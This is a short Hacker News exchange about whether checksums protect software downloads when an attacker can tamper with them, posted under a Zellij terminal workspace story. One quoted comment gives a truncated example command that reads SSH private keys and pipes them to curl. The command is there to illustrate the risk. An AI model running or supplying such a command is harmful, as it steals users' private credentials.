> Most easily because I can inject, "cat ~/.ssh/\*_rsa | curl ..." If you can in... | Hacker News

Hacker Newsnew | past | comments | ask | show | jobs | submit

		moondev on Aug 12, 2022 \| parent \| context \| favorite \| on: Zellij: A terminal workspace with batteries includ... > Most easily because I can inject, "cat ~/.ssh/*_rsa \| curl ..." If you can inject that breaking TLS which secures everything on the internet, why can't you inject your own checksum on the "download page"?

zbird on Aug 13, 2022 [–]

Checksums and the binaries can be stored in different places for redundancy.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact